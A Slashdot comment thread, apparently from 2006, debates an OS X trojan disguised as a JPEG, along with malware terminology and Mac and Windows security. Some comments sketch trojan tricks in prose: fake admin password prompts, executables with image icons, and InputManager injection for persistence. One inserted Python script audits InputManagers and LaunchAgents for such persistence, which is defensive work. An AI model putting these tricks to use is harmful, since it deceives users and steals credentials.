      I was thinking about this the other day. Can a program enter those details into those prompts or only a keyboard device? I assume there is something to stop someone from making a small application which prompts you for admin username and password (captures those details) and then uses them maliciously? It could be a small launcher type program which prompts you, you'd expect it to, it captures those details and then completes your install with them. Everything would look normal, except for the fact that your admin username and password have been captured. Is this possible in OSX?

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
    28. Re:It's not a virus... by m50d · · Score: 1
      The security flaw is allowing applications to have icons that look exactly like system icons for things. At least it isn't exacerbated by hiding file extensions by default like on windows, but it's still a problem.

      Yes, this is a user stupidity issue. However, so is 99% of the malware windows gets trashed for.

      --
      I am trolling
    29. Re:It's not a virus... by Seferino · · Score: 1
      I agree that there is something of a double-standard. However, the big difference between most Windows trojan/virus scares and this specific trojan is that, in this case, the OS behaves exactly as it is expected to behave. By opposition, buffer overflow attacks are programming errors (which shouldn't exist in this day and age, but that's a different discussion). I did mention most Windows trojan/virus scares, not all, as this kind of trojan is quite feasible under Windows.

      Now the question is: how do you make sure trojans can't happen? I've seen a few potential "security measures" being discussed

      1. somehow forcefully differentiate executables from everything else, either by modifying the icon or by changing the font
      2. warn the user every time an executable is created/downloaded/extracted
      3. warn the user every time an executable is executed, if this executable hasn't been installed by the administrator
      4. don't let users have executable programs at all
      5. proof-carrying code/checked executables
      6. more sandboxing/dynamic authorisations for just about everything.

      I'd say that proposition 1. has a fighting chance. Propositions 2., 3. and 4. will probably be quickly deactivated as "too clumsy". Proposition 5. would be great if engineers (not to mention "home" web developers) had the skills to actually get it to work. Too bad it's currently not cost-efficient to teach proofs to engineers, nor giving them the time to actually prove their programs. Proposition 6. might be the future, with Ajax-style apps and all that, but I'm afraid it requires too much education from the user.

      Any other idea roaming around?

    30. Re:It's not a virus... by Angostura · · Score: 1

      The only OS X security flaw in this case, I think is the lack of a clear visual representation that the newly acquired file is an executable, irrespective of what the icon may attempt to show.

      Hopefully Apple can fix this up fairly easily.

    31. Re:It's not a virus... by Anonymous Coward · · Score: 0
      You cannot be infected by this unless you do all of the following:

      1) Are somehow sent (via email, iChat, etc.) or download the "latestpics.tgz" file

      2) Double-click on the file to decompress it

      3) Double-click on the resulting file to "open" it ...and then for most users, you must also enter your Admin password.

      1, 2 and the first half of 3 sound like many of the biggest Windows problems out there.

      Second half of 3 is wrong. If you are not running as root (and I'm guessing most OSX users are not) you will not be asked for a password, it will run as your UID and it can have access to wreck users programs and data. I've never understood why some people think not running as admin/root is some kind of panacea. It is my data and user environment I'm worried about.

    32. Re:It's not a virus... by Tenk101 · · Score: 1


      This just isn't true. If you have a jpeg with code embedded inside it, the OS just won't be able to decompress it into a screen image; this is exactly the same as any other operating system. There isn't anything about an image that can alter a stack frame as a result of decompression so you can't force an alternate path of execution.

      Am I missing something here or is this just anti-windows FUD?

    33. Re:It's not a virus... by DieByWire · · Score: 1
      3) Double-click on the resulting file to "open" it ...and then for most users, you must also enter your Admin password.

      Is it true that if you're running under the admin account, you won't get the admin password prompt? Some in the thread you linked to say so.

      Most private (not lab) Macs I've dealt with are running under the admin account most of the time, and getting someone to double-click on what they think is a picture would be pretty easy - especially since Mac users are fairly confident about the safety of their machines, and consider images 'safe.'

      It's not a virus, but if it's true that the admin account won't get a password prompt, I think this could trick quite a few people easily.

      Right-click -> 'Open with Preview' from now on?

      --
      Never shake hands with a man you meet in a fertility clinic.
    34. Re:It's not a virus... by Coryoth · · Score: 1

      Now the question is: how do you make sure trojans can't happen?

      Well you could do something similar to what Linux DEs do and not let applications define a custom icon (unless they've been installed, and installed their icon on the system). The OS assigns all icons based on MIME type, and applications don't get to choose their own icon.

      You could also have better least privilege sandboxing available. It's not foolproof, plenty of people will still click through a warning about the application trying to access your addressbook and network and give it suitable rights to run, but it will give some people pause. Some sort of system of Mandatory Access Controls as in SELinux would be suitable. All it really needs is other applications to respect such a security configuration, and a nice user interface put on the whole thing (so that it mostly warns a user about disallowed access attempts, with a prompt asking if they want to update security to allow it in future, and a simple system for programs to request specific access rights on install).

      Sure neither of those options are completely bullet-proof - nothing is in the face of true human stupidity. On the other hand either or both of those would offer a very significant improvement in security and robustness against such trojans and viruses over what MacOSX currently offers.

      Jedidiah.

    35. Re:It's not a virus... by Coryoth · · Score: 1

      But is it really true that a Linux exe can't have its own icon? I thought they could... Or perhaps they can only once installed by the user?

      When an application installs it can put an icon in the appropriate place on the system, and add appropriate entries such that the application menu entry and window decorations appear using that icon. The actual executable file itself can't change its icon. Go to "/usr/bin" on a Linux system in the file manager and scroll through - even your standard programs that all have nice icons in the menu have standard "executable" icons based on their MIME type.

      Jedidiah.

    36. Re:It's not a virus... by DaggertipX · · Score: 1

      I do not know the specifics as I don't run windows any longer, and didn't bother looking into it...
      HOWEVER - There was recently a remote execution exploit to the windows image rendering code. So yes, viewing an image on a Windows machine that is unpatched can be dangerous.
      Perhaps one of our windows using friends out there can provide more details if you need it...

    37. Re:It's not a virus... by Overly+Critical+Guy · · Score: 2, Insightful

      Precisely.

      1.) This isn't the "first OS X virus." Several other proof-of-concept attempts have been written over the users, notably MP3Concept.

      2.) This doesn't qualify as a virus, it's more of a trojan.

      3.) The fact it prompts for your password immediately renders it useless and ineffective as a trojan. I could write an AppleScript that deleted all of your system files but required your password to be entered for it to run--that doesn't mean I've written the "first OS X virus." It just means I've written a goofy program that relies on stupidity, which would be the same as any other password-based system in the world and not an OS flaw.

      I was expecting a bunch of rampant Apple-bashing in the comments here, but it seems a lot of people are recognizing that this is non-news. Another password-required proof-of-concept that doesn't really do anything.

      --
      "Sufferin' succotash."
    38. Re:It's not a virus... by Anonymous Coward · · Score: 0

      The Karma Sutra worm and this silly non-story are two completely different things. Folks, THIS OS X "VIRUS" IS NOT AN IMAGE FILE. It is just an application with a jpg icon. If Apple has any fault in this it is a design fault with not somehow specifically distinguishing icons for executables as separate from others (think shortcut arrow in Windows land). There is no fault in OS X's security or with how jpg files are viewed.

      In the case of the Karma Sutra worm there was a definite design flaw being exploited. The worm WAS IN AN IMAGE FILE. Not in an executable with a misleading icon. The WMF standard was written specifically to allow for executable code to be stored within the image file, and someone finally decided to exploit that.

      Do you see the difference?

      Karma Sutra == Actual image file that has no business executing code.

      OS X "Virus" == An executable with a freaking jpg icon.

      This is not a virus. This is not a worm. This is really a pathetic attempt at a Trojan by a 14 year old.

    39. Re:It's not a virus... by Overly+Critical+Guy · · Score: 3, Insightful

      The flaw is that a file of one type is able to present itself as a file of another. This flaw was widely exploited in Windows a few years ago with the notorious "britney.jpg .vbs" type attacks, in which even though the icon was wrong (!!) people saw the file extension and opened it.

      I think people are misunderstanding how OS X handles file type icons. The file isn't presenting itself as a file of another type. If you did a Get Info, it would still say Application. On OS X, you can copy and paste any icon into a file in the Get Info window. I have cool Mario icons for my various external USB drives. Someone just copied and pasted the JPEG icon in this case.

      The fact that clicking this thing prompts for a password means OS X is correctly protecting you from this kind of an attack. Beyond that, anyone entering the password and enabling admin access for this program is at fault, not OS X.

      --
      "Sufferin' succotash."
    40. Re:It's not a virus... by Overly+Critical+Guy · · Score: 1

      People are criticizing Windows for not providing "security" measures against those files so I don't see why you wouldn't do the same for mac os x

      OS X gives a password prompt, so it IS providing security measures against these types of files (so to answer the headline, no, this isn't the "first OS X virus"), but Windows doesn't present a password prompt at all--viruses just silently run and hook themselves into the registry and other system files, hence the criticism. That's not a double-standard; it's justified criticism toward a dominant operating system that still runs the majority of its users in a full root access account in the year 2006.

      --
      "Sufferin' succotash."
    41. Re:It's not a virus... by Overly+Critical+Guy · · Score: 1

      over the users

      Whoops--over the years!

      --
      "Sufferin' succotash."
    42. Re:It's not a virus... by IamTheRealMike · · Score: 2, Insightful
      I think people are misunderstanding how OS X handles file type icons. The file isn't presenting itself as a file of another type. If you did a Get Info, it would still say Application.

      I understand just fine what's going on here. The problem is that humans go by icon to determine file type, whereas the machine goes via some other mechanism. The fact that you can find out what the machine thinks it is via some other route isn't relevant - the same was true of Windows yet the exploit still worked on significant numbers of people. It's for this reason that Outlook refuses to let you open or save executable file types these days.

    43. Re:It's not a virus... by diegocgteleline.es · · Score: 1

      Like you need root access to look for email addresses or hook up in the IM program to autosend itself via IM....

    44. Re:It's not a virus... by Overly+Critical+Guy · · Score: 1

      1.) When you start to download this .tgz file in Safari, it warns you that it's an application and asks if you want to continue. Safari auto-scans all downloads that way.

      2.) When you run this program, it brings up a password prompt to ask for your permission.

      God, how much more does Apple have to do to tell you it's an executable and not a simple JPEG?

      --
      "Sufferin' succotash."
    45. Re:It's not a virus... by Anonymous Coward · · Score: 0

      God, you left out the biggest part which is that Safari tells you it's an application when you start the download of the .tgz (Safari scans every file you download and warns you about crap like this). This is a total non-starter of a trojan/virus.

      I think this story was planted by someone at Symantec so they can sell copies of their useless Antivirus software. It makes me sick to my stomach that uninformed people will read these reports from "security researchers" and believe OS X is now infected with something bad, when it's not... it's painful how uneducated the tech press is today when it comes to Mac security. They're totally against Macs, I swear.

    46. Re:It's not a virus... by Anonymous Coward · · Score: 0

      It will only extract if you downloaded it with Safari (or another browser that opens files after downloading) and have "Open Safe Files Automatically" enabled.

      If it's sent to you via iChat, it won't decompress on its own.

    47. Re:It's not a virus... by Thalagyrt · · Score: 1

      Except, this virus doesn't require or even ask for an admin password. The initially created account, which most users use, has write rights to /Applications, and /Library, which is all the virus needs to install itself. You open the file, it executes a script, and writes itself into random applications as well as the Library directory.

      --
      Buffalo buffalo Buffalo buffalo buffalo buffalo Buffalo buffalo!
    48. Re:It's not a virus... by ceoyoyo · · Score: 1

      If this were a single file executable then it couldn't have its own icon, it would be displayed with a default "command line tool" icon. It must be a .app bundle, which is really a directory, so it can't be sent to you in an executable form... it has to come via an archive. Which means that you have to decompress it, THEN run it. Safari (and possibly iChat and Mail) will warn you that you're decompressing an application.

      All in all, quite a bit of security there to keep you from hurting yourself. Not to mention OS X makes it really easy to see what that thing actually is before you double click on it -- either switch to three pane view and you get the file type right there, or hit Apple I (or select Info from the menu) and there you are.

    49. Re:It's not a virus... by ceoyoyo · · Score: 1

      No, it's not true. Macs don't have AN admin account, rather, any user can be given admin privileges. You need to enter your password to use them though. If you're a non-admin account then you'd have to enter the username and password for an admin account when asked.

      Admin privileges are not the same thing as running as root.

    50. Re:It's not a virus... by javaxman · · Score: 1
      true. OS X only adds the 'protection' of requiring Admin authentication, and that only happens in this case because the executable tries to modify admin-only file directories.

      So add 4. run as Administrator constantly or always authenticate when prompted.

      As has been pointed out very, very often, the first part of (4) is default behavior for Windows. Not so on OS X, so it's less of an issue.

      Still, I don't want to use a system that's so user-unfriendly that it prevents you from running this type of program completely; how the heck would you ever install a new program?

      Sadly I think the best we can do is try to make sure you know when you've downloaded an executable, and try to let you know before an executable attempts to modify system files... going any further could make your system very difficult to use indeed.

    51. Re:It's not a virus... by Arandir · · Score: 1

      On Linux MIME scanning is used to make this type of attack significantly harder. A file's icon is assigned by the operating system according to what type of file it actually appears to be, and executables cannot choose their own icons.

      I don't know what Linux you are using, but that's not the way it works with any Linux I have ever used. The file icon gets assigned by the desktop and/or file manager, typically as the result of an included .desktop file in the case of packaged executables. Granted, the icon is not embedded in the file like it is in Windows or OSX, but neither is it significantly difficult to fool an unalert Linux/BSD/Unix user.

      For example, I could distribute a .desktop file with the title of "sexypic.jpg", an executable field specifying bash and a -e command, and specifying the system jpg icon for its icon. Tada! A Linux executable masquerading as a jpg file, complete with jpg icon.

      --
      A Government Is a Body of People, Usually Notably Ungoverned
    52. Re:It's not a virus... by Arandir · · Score: 1

      Clicking on the executable will also prompt you with the "you haven't run this application before" dialog.

      --
      A Government Is a Body of People, Usually Notably Ungoverned
    53. Re:It's not a virus... by mr+i+want+to+go+home · · Score: 1
      I was actually quite pleased by the quick insight - the third post was "The download is a unix executable file which opens in Terminal but is disguised as a jpeg.".

    54. Re:It's not a virus... by Anonymous Coward · · Score: 0

      3.) The fact it prompts for your password immediately renders it useless and ineffective as a trojan. I could write an AppleScript that deleted all of your system files but required your password to be entered for it to run--that doesn't mean I've written the "first OS X virus." It just means I've written a goofy program that relies on stupidity, which would be the same as any other password-based system in the world and not an OS flaw.

      First, actually it does not need to prompt for a password and if it does, it is buggy. Any program you run can copy a file to ~/Library/InputManagers and this InputManager will be loaded in every started program then. No need for admin rights.

      Second, even if such a beast needs admin rights, that's easy. Just keep running in the background and wait for a nice opportunity to prompt the user. Wait for a system update run or some app installation. 99% of all users will happily provide a password on such occasion, without thinking twice.

      Face it, OS X is full of features just waiting to be exploited. Even without exploiting bugs, just trick the user into opening a file which is a disguised application and you can do almost anything if you know your target group.
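
A check for the user-writable load path the comment names, as an added example rather than code from the thread: it enumerates ~/Library/InputManagers (every entry there is loaded into each Cocoa application the user starts, with no admin prompt involved in putting it there) and, as an assumption about the same era's layout that the comment does not mention, ~/Library/LaunchAgents, reporting what each agent plist would run at login. The home directory it scans is constructed in a temporary directory; the LatestPics name and the /Users/demo path are invented for illustration.

```python
import os
import plistlib
import tempfile
from typing import Dict, List


def audit_input_managers(home: str) -> List[Dict[str, str]]:
    """Report every entry under ~/Library/InputManagers.

    Each entry is a folder holding an Info file plus a .bundle that gets
    loaded into every Cocoa application the user starts.
    """
    root = os.path.join(home, "Library", "InputManagers")
    findings = []
    if not os.path.isdir(root):
        return findings
    for entry in sorted(os.listdir(root)):
        path = os.path.join(root, entry)
        bundles = []
        if os.path.isdir(path):
            bundles = sorted(n for n in os.listdir(path) if n.endswith(".bundle"))
        findings.append({
            "location": "InputManagers",
            "name": entry,
            "bundles": ",".join(bundles),
            "has_info_file": str(os.path.isfile(os.path.join(path, "Info"))),
        })
    return findings


def audit_launch_agents(home: str) -> List[Dict[str, str]]:
    """Report what each per-user launchd agent would run and when."""
    root = os.path.join(home, "Library", "LaunchAgents")
    findings = []
    if not os.path.isdir(root):
        return findings
    for entry in sorted(os.listdir(root)):
        if not entry.endswith(".plist"):
            continue
        try:
            with open(os.path.join(root, entry), "rb") as fh:
                plist = plistlib.load(fh)
        except Exception:
            plist = None  # a plist launchd cannot parse is still worth a look
        if plist is None:
            program, run_at_load = "<unparseable>", "?"
        else:
            args = plist.get("ProgramArguments") or [plist.get("Program", "")]
            program = " ".join(str(a) for a in args)
            run_at_load = str(bool(plist.get("RunAtLoad", False)))
        findings.append({"location": "LaunchAgents", "name": entry,
                         "program": program, "run_at_load": run_at_load})
    return findings


def audit_user_persistence(home: str) -> List[Dict[str, str]]:
    """Both per-user load paths, InputManagers first."""
    return audit_input_managers(home) + audit_launch_agents(home)


def build_demo_home() -> str:
    """Constructed sample home directory; the bundle and agent are empty shells."""
    home = tempfile.mkdtemp(prefix="demo-home-")
    manager = os.path.join(home, "Library", "InputManagers", "LatestPics")
    os.makedirs(os.path.join(manager, "LatestPics.bundle", "Contents", "MacOS"))
    with open(os.path.join(manager, "Info"), "w") as fh:
        fh.write("")  # the loader expects an Info file beside the bundle
    agents = os.path.join(home, "Library", "LaunchAgents")
    os.makedirs(agents)
    with open(os.path.join(agents, "com.example.latestpics.plist"), "wb") as fh:
        plistlib.dump({"Label": "com.example.latestpics",
                       "ProgramArguments": ["/Users/demo/Library/latestpics"],
                       "RunAtLoad": True}, fh)
    return home


if __name__ == "__main__":
    for finding in audit_user_persistence(build_demo_home()):
        print(finding)
```

Run it against a real home directory by passing os.path.expanduser("~") instead of the demo path; an empty result for InputManagers is the normal state for a machine that has never had an input manager installed on purpose.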

    55. Re:It's not a virus... by njyoder · · Score: 1

      Don't generalize about the "windows scenario." There are far more virus/trojans of the form .jpg.exe than actual jpegs that use a buffer overflow. This uses a simple and dumb wetware vulnerability that is extremely common for windows viruses/trojans.

    56. Re:It's not a virus... by njyoder · · Score: 1

      1) Are somehow sent (via email, iChat, etc.) or download the "latestpics.tgz" file

      This is automated by the virus/worm itself.

      3) Double-click on the resulting file to "open" it ...and then for most users, you must also enter your Admin password.

      Nope, it doesn't need admin privileges to spread. Besides, how is this different from most windows viruses/worms?

    57. Re:It's not a virus... by NutscrapeSucks · · Score: 1

      A file's icon is assigned by the operating system according to what type of file it actually appears to be

      So, what you're saying is that it's impossible for applications to have custom icons in Linux shells? That would seem abnormal (relative to Mac and Windows).

      --
      Whenever I hear the word 'Innovation', I reach for my pistol.
    58. Re:It's not a virus... by Starxxon · · Score: 1

      Clicking on the executable will also prompt you with the "you haven't run this application before" dialog.
      Not true in this case.

  4. Hardware by levik · · Score: 4, Funny

    Well, of course there's a mac virus now - virus writers have been comfortably writing to the intel platform for years, and now with the processor switch, all the viruses will be very easy to port over :)

    1. Re:Hardware by creepynut · · Score: 1

      Yeah. Which is why viruses on Linux are so rampant in the wild.

    2. Re:Hardware by iBod · · Score: 2, Insightful

      I don't think the underlying CPU architecture is much of an issue.

      Most malware exploits flaws in the operating system and applications - not the hardware architecture.

      I have heard this FUD from various Mac-heads (pissed at the change from PPC) that they are suddenly going to be swimming in malware due to a chip change. It's nonsense.

    3. Re:Hardware by JFlex · · Score: 1

      A combination of many things, including and not limited to Windows' insecurity and poor programming are reasons why there are more viruses and malware for Windows.. not because of the processor architecture.

    4. Re:Hardware by Fahrvergnuugen · · Score: 1

      This trojan is compiled as a PPC binary too.

      --
      Kiteboarding Gear Mention slashdot and get 10% off!
    5. Re:Hardware by InfraredAD · · Score: 1

      Hey genius, if you had a clue you'd see that the code is written for PowerPC. Good try though, why don't you go back to watching Teletubbies or something...

    6. Re:Hardware by Anonymous Coward · · Score: 0

      Linux users don't even enable cookies in the web browser. We don't fall for these lowly attempts to spread viruses and trojans. Mac users on the other hand can possibly be the best target possible. They have 100% trust in everything related to their computers.

    7. Re:Hardware by Anonymous Coward · · Score: 0

      wooooosh!

  5. Trojan? by __aambat2633 · · Score: 5, Insightful

    How can it be a virus if it is a Trojan?
    You have to execute it yourself, and that is why it is _not_ a virus.

    1. Re:Trojan? by the_humeister · · Score: 1

      Once the media gets a hold of a blanket term, we're stuck with it. Yes, it's technically a trojan. But nowadays malware that's not adware gets lumped into the virus category. Take a look at the term "hacker." "Cracker" would be the preferred term for a bad hacker, but the media still uses "hacker."

    2. Re:Trojan? by Emetophobe · · Score: 2, Informative

      Also, it's masking itself as something that it is not, which would make it a trojan.

    3. Re:Trojan? by __aambat2633 · · Score: 0

      But slashdot is not the daily inquirer.

    4. Re:Trojan? by Anonymous Coward · · Score: 0

      How does it propagate itself? I thought the user had to download or receive it from someone else AND grant admin access. A virus would infect the machine with no help from the user -- this can't do that.

    5. Re:Trojan? by Psykus · · Score: 1

      From what I've always been told, a trojan is just another type of virus. An automatically spreading virus that actually exploits flaws in the OS would be a worm, another type of virus.

      Is there another definition of virus/trojan/worm that I'm not aware of?

    6. Re:Trojan? by dan+the+person · · Score: 1

      From TFA: "According to the initial investigation, the application uses Spotlight to find the other applications on the infected machine and subsequently inserts a stub of code into each application executable."

      So it infects other applications without user intervention.

      Remember, the term virus was in use long before networked machines were common. Self propagation doesn't have to mean infecting applications on a different machine.

    7. Re:Trojan? by 99BottlesOfBeerInMyF · · Score: 4, Informative

      How can it be a virus if it is a Trojan?

      OK, welcome to malware nomenclature 101. Will everyone please take their seats. Thank you. There are three basic classifications for malware:

      • trojan - malicious application disguised as either a benign application or data.
      • virus - a malicious application that copies itself into other locations infecting data or applications in an attempt to spread. Viruses often attempt to e-mail, IM, FTP, etc. themselves to other machines.
      • worm - a worm is a virus that auto-propagates. That is to say it sends copies of itself automatically and traditionally without any user intervention.

      This particular malware is a trojan (partly disguised as a jpg) which then copies itself to a new location on your drive and modifies a few commonly used applications in order to spread itself via the Bonjour discovery and file transfer mechanism in OS X. It requires human intervention to be extracted, run, spread, and downloaded. I'd call this a virus to be clear about its functionality.

    8. Re:Trojan? by Anonymous Coward · · Score: 0

      I don't trust you, teacher, for you do not know it's named a Trojan horse.

    9. Re:Trojan? by MarkCollette · · Score: 1

      How can it be a virus if it is a Trojan?
      You have to execute it yourself, and that is why it is _not_ a virus.


      Sure it is. Remember when the Greeks invaded Troy, and used a virus to infect a horse, to kill the aliens defending Troy?

    10. Re:Trojan? by vasko · · Score: 1

      Well, it is a virus - just the Bosnian one:

      You just received Bosnian virus. As we have no programming experience this virus works on the confidence principle. Please remove all files from your hard disk and manually forward this virus to everyone in your address book.

      Thank you for your cooperation.

      Bosnian


      P.S. first send virus, then erase disk.

      :)

    11. Re:Trojan? by godglike · · Score: 1

      It seems to me that the common usage doesn't actually agree with your description. Technically you're correct but in everyday English "virus" seems to be used for any malicious application, whereas "worm" and "trojan" are specific varieties of virus.

      So:
      a virus is a worm or trojan.
      a trojan is a virus that tricks people into helping it.
      a worm is a virus that works without user interaction.

    12. Re:Trojan? by Anonymous Coward · · Score: 0

      Welcome to the new frontier of Blended Threats.

      This "exploit" uses Social Engineering to lure the victim to download & execute a Trojan that replicates & propagates itself like a Virus.

      Not that sophisticated, but potentially mildly effective.

  6. You want security... by Anonymous Coward · · Score: 0, Funny

    Use windows vista. I heard it has zero viruses.

    1. Re:You want security... by Vo0k · · Score: 1

      But it DOES have 0 viruses.
      yet.

      --
      Anagram("United States of America") == "Dine out, taste a Mac, fries"
    2. Re:You want security... by Mistshadow2k4 · · Score: 1

      I highly doubt that. There are viruses that were made when Windows ME was new that will still affect an unprotected installation of Windows XP. In other words, since Microsoft did not fix some vulnerabilities for XP what makes you think they would for Vista?

      --
      I dream of a better world... one in which chickens can cross roads without their motives being questioned.
    3. Re:You want security... by douglasq · · Score: 1

      So much for backwards compatibility.

      --
      "Form should follow function...unless it's just plain ugly."
  7. Had to happen really by iBod · · Score: 2, Insightful

    But, I don't think OS X users have too much to worry about yet.

    Might be good in a way - to shake some people out of the complacent "OS X is invulnerable" mindset.

    1. Re:Had to happen really by Sandor+at+the+Zoo · · Score: 1
      The fact that this is news (actual Mac OS X malware!) is amazing.

      What it tells us, I'm not sure. Depending on your viewpoint it's either Wow, Mac OS X is so secure that it took till now to have a virus! or Yeah yeah, Mac market share is so low that it took till now to have a virus.

      :-) for the humor-impaired.

    2. Re:Had to happen really by WhiteWolf666 · · Score: 1

      No operating system is invulnerable versus administrator stupidity; and that's what anyone holding the admin password is.

      User error can, and will, tank an operating system. The trick in OS design is making it difficult and obvious that they are about to do so.

      --
      WhiteWolf666 an exBush supporter. All you new-school,compassionate,save the children Republicans can rot in hell
  8. Eh? by TimeTrav · · Score: 3, Funny

    Wouldn't shock me if it was written by a software company whose name rhymes with 'pedantic'.

    --
    [sig]you really dont want the answers, trust me[/sig]
  9. Reminds me of old Applescript "hacks" by Anonymous Coward · · Score: 5, Interesting

    Back in high school we used to make little mean scripts in Applescript. Since there was no concept of security or multiple users in Mac OS 7 and 8, the script could do all sorts of nasty damage. All you had to do was compile/"save as" a standalone executable application from the Applescript Editor and paste an innocent icon on it. We liked to use the ClarisWorks icon to be extra mean.

      Another variant was useful on computers that were protected with OnGuard or AtEase. Simply make a script that would pop up a dialog box asking for the password. An unknowing teacher would enter the password and the script would exit... leaving behind a log file with the password in it for later use.

    Nothing magical about these. Very basic trojan horses.

    1. Re:Reminds me of old Applescript "hacks" by tinkerghost · · Score: 2, Funny

      Ahh the days of pasting hard drive icons on a shutdown link .... I remember them well :)

    2. Re:Reminds me of old Applescript "hacks" by Mistshadow2k4 · · Score: 1

      I remember reading somewhere that there had been about 500 such malware scripts in the wild that affected the Mac (no link, it's been a couple of years). I don't know if this is true or not, but if so, did Apple release patches to prevent them from affecting the Mac? Of course, as I understand it, these scripts wouldn't affect OSX because it's built over BSD anyway, but it's important to know if they will make a patch to protect against this one.

      I'm glad this happened, but not in the anti-Apple way you might think. It proves one of my points I've posted before - that a system that requires a password to run such programs or otherwise modify the OS is much more secure. This trojan seems to have other effects though even without the password, judging from some of the posts here; kind of uncertain at this point. Fortunately for my business, it's quite apparent that Microsoft will never wise up in this regard.

      --
      I dream of a better world... one in which chickens can cross roads without their motives being questioned.
    3. Re:Reminds me of old Applescript "hacks" by anaesthetica · · Score: 1

      Or putting the Shut Down script in the Startup Items folder. That one got announced at assembly the next day ;)

  10. Consider the source... by k3vmo · · Score: 4, Insightful

    Come on. MacOSRumors.com on a forum post. Let's not loose our heads and start spreading FUD because of something someone's brother's first cousin's next-door neighbor read in a forum post. If you're smart enough not to accept random files and put your admin password in for anything that pops up, this won't be much of an issue.

    1. Re:Consider the source... by Anonymous Coward · · Score: 0

      Let's not loose our heads

      One of the few phrases where the "alternative" spelling of lose still works just fine.

    2. Re:Consider the source... by Psykus · · Score: 1

      The same exact thing could be said for Windows security for the most part. There seems to be a double standard for OSX..

    3. Re:Consider the source... by blast3r · · Score: 1

      Sophos posted an advisory as well.
      http://www.sophos.com/virusinfo/analyses/osxleapa.html

    4. Re:Consider the source... by eheldreth · · Score: 1

      Perhaps it's not so much a double standard as a statement on the relative intelligence of the standard Windows user.

      --
      The perversity of the Universe tends towards a maximum. - O'Toole's Corollary
  11. Hehehe by Ravenscall · · Score: 0, Flamebait

    First, they dump the Power PC chip right before it is announced that they will be able to push it to 6 Ghz, then, they start getting viruses.

    Where is your God now Mac users?

    (Liked Macs when they still pushed performance over style)

    --
    You say you want a revolution....
    1. Re:Hehehe by jtalerico · · Score: 1

      First, they dump the Power PC chip right before it is announced that they will be able to push it to 6 Ghz, then, they start getting viruses.

      I agree with you on that, but RIGHT now the 6 GHz is a server chip.

      It is not a virus, it is just a simple script. An idiot searching on Google can figure out how to write a bash script.

      Where is your God now Mac users?

      There is a Mac God?
      (Liked Macs when they still pushed performance over style)

    2. Re:Hehehe by iBod · · Score: 1

      "Liked Macs when they still pushed performance over style"

      When was that?

      Apple have always put a premium on style and their performance per buck was always behind the curve - even since the original 68000 Macintosh. You had one because it was cool, not for blistering performance.

    3. Re:Hehehe by green+pizza · · Score: 1

      "Liked Macs when they still pushed performance over style"

      When was that?


      Macintosh IIfx
      Macintosh Quadra 900 and 950
      Daystar quad PowerPC 604e Mac clone

      Ugly and fast. Like a good muscle car.

    4. Re:Hehehe by Meostro · · Score: 2, Funny
      There is a Mac God?
      They've got one coming out in six months, it's called the iGod.
    5. Re:Hehehe by iBod · · Score: 1

      Yeah, I see what you're saying GP but those were somewhat atypical Macs.

      Even so, with exception of the Daystar clone, they were still reasonably stylish compared to the Wintel beige boxes.

    6. Re:Hehehe by iBod · · Score: 0, Offtopic

      Is that a bit like Your Own Personal Jesus?

    7. Re:Hehehe by Jarlsberg · · Score: 4, Funny
      There is a Mac God?

      They've got one coming out in six months, it's called the iGod.

      Nah, that's just the title of Steve Jobs upcoming self-biography.
    8. Re:Hehehe by Ravenscall · · Score: 1

      Not true, in the early G3/G4 days, the PPC chip could knock the pants off of anything in the PC world for raw performance. That started slipping just before the G5 was introduced. Granted, they had been on the style kick ever since Jobs had returned, but there was more reason to get a Mac than just "shiny".

      Now, that is the only reason to buy a Mac. It is computing for the style conscious and kids with ADHD. You will get a better machine rolling your own hardware and installing *nix.

      --
      You say you want a revolution....
    9. Re:Hehehe by Anonymous Coward · · Score: 0

      >>It is computing for the style conscious and kids with ADHD

      I thought kids with ADHD all ran Linux!

    10. Re:Hehehe by mdarksbane · · Score: 1

      I'd say it was more right around the end of the 604e. PowerPCs have almost always been faster than a Pentium clock for clock, and for a while Apple (and clones) had 300-350 MHz 604e's and 300 MHz G3's while the Pentium was at 266-300. There was a significant speed difference.

      I'd say they were at least somewhat ahead all the way from the transition to the PPC to when the first Athlons came out. Until then, Intel hadn't had any real need to push the speed of their processors too much, and the Motorola and IBM chip devs had managed to stay ahead of them in most counts. Then suddenly the Athlon came out, and x86 chips pushed to 1 GHz in almost no time, while at the same time Motorola completely stalled on their G4 development (it was originally announced at 500 MHz, wasn't it? Then they couldn't actually make those, and it got dropped to 450 MHz, and it stayed at 450 MHz for a long time).

      I think that part of apple's whole transition to style over speed came from the fact that, through a situation over which they had little control, they suddenly had a processor that had been stuck at the same mhz for over a year with only marginal improvements in sight. They started running dual G4's in everything, which helped a lot (you think they would have done the extra cost of that, especially BEFORE they had a real multi-tasking OS, if they had a choice?) but still couldn't keep up with a good Athlon in most apps, which are still usually single-threaded and gain nothing from the second processor. Look at the benchmarks from that time period - it becomes very apparent that in general tests that actually use both processors, the dual G4 was about as fast as a good Pentium or Athlon. In the tests that didn't, it was about 2/3 as fast. In the few things that actually used Altivec (if you think it was all marketing hype, you've never tried to run DivX on an old G3 500. A single G4 400 handles it fine), they jumped way ahead.

      What this actually translated to, if you were actually using the system instead of just benchmarking it, was that for big multitaskers, the G4 was as good of a workstation as the current PC's. For Apple apps, which all took advantage of Altivec, it was a screaming fast machine. For games, or people who only run one or two apps at a time, it probably sucked compared to their PC at home.

      I guess what I'm meaning with all this is that at one time, right before Intel really figured out how to work around the old x86 architecture they've been dragging around for years and AMD suddenly gave them some real competition, Macs were faster than PC's. Since then they've been somewhat slower, but I don't think that's necessarily been a choice that Apple made as much as it was a very bad run of luck.

    11. Re:Hehehe by Mistshadow2k4 · · Score: 1

      Makes sense. After all, Mac users have been bragging for decades over how it was intelligently designed....

      --
      I dream of a better world... one in which chickens can cross roads without their motives being questioned.
    12. Re:Hehehe by Anonymous Coward · · Score: 0

      Oooo I hope they license the Flying Spaghetti Monster! Those other gods are so "Wintel".

    13. Re:Hehehe by dfghjk · · Score: 1

      Sure, except at the time of the 604e the Pentium Pro had already been out a year. When the G3 was announced the Pentium II had already been in the market for 5-6 months.

      Claiming that PowerPCs have almost always been faster than a Pentium clock for clock is also not true. The original 601 and 603 were not. The 604 was faster than the Pentium but not the Pentium Pro at the time. The G3 and G4 were not faster than the Pentium II and after. The G5 faster than the P4 but not the Pentium M or the AMD parts. Fact is the opposite is true, but no matter. Macs have never had a demonstrable performance lead over PCs in the general case. Sure, DP G5s are faster than single-processor PCs, and G4 and G5 vector processing has mostly been superior, but as a general rule the basic computing performance of Macs has always lagged.

